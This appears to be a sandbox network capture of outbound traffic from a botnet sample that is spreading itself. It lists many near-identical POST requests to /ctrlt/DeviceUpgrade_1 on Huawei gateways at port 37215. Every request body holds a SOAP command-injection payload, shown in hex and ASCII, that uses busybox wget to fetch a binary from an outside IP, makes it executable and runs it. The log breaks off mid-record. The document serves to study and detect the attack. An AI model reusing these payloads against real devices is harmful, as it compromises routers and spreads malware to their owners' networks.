                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2178192.168.2.135743213.51.133.6437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.728631020 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2179192.168.2.133570841.95.27.5137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.728655100 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2180192.168.2.136060841.200.9.7937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.728696108 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2181192.168.2.1337178157.125.134.10537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.728727102 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2182192.168.2.1358524157.244.29.3737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.728741884 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2183192.168.2.1360442197.26.150.13637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.728761911 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2184192.168.2.134741241.31.57.11537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.728777885 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2185192.168.2.135372419.47.100.14937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.728792906 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2186192.168.2.1353266157.30.141.25037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.728802919 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2187192.168.2.1345718197.74.31.15537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.728976965 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 